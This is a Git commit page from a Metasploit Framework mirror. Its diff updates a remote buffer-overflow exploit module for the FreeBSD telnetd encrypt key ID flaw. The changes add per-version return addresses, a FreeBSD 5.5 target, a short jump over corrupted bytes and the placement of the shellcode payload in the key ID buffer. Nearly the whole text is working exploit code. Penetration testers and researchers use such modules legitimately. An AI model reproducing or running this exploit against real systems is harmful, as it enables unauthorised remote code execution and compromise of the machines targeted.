infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

More testing - looks like 5.5 is not exploitable, at least not the same 

way
unstable
HD Moore 2011-12-28 01:30:25 -06:00
parent e071944a1a
commit 1ff0cb2eef
1 changed files with 18 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
View File

@ -46,12 +46,16 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Automatic', { } ],
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx (needs testing)
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx (needs testing)
[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx (needs testing)
[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx (needs testing)
[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx (needs testing)
[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ] # call edx (needs testing)
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
# Version 5.4 does not seem to be exploitable (the crypto() function is not called)
# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => ''))
@ -67,6 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"
# Telnet protocol requires 0xff to be escaped with another
penc = payload.encoded.gsub("\xff", "\xff\xff")
key_id = Rex::Text.rand_text_alphanumeric(400)
@ -75,11 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote
key_id[76, 4] = [ t['Ret'] ].pack("V")
# Some of these bytes can get mangled, jump over them
key_id[80,40] = "\x00" * 40
key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)
# Insert the real payload (ff -> ff ff)
key_id[120, penc.length] = penc
# Bounce to the real payload (avoid corruption)
key_id[120, 2] = "\xeb\x46"
# The actual payload
key_id[192, penc.length] = penc
# Create the Key ID command
sploit = enc_keyid + key_id + end_suboption
@ -112,6 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
# The second request results in the pointer being called
print_status("Sending second payload...")
sock.put(sploit)
handler
::IO.select(nil, nil, nil, 0.5)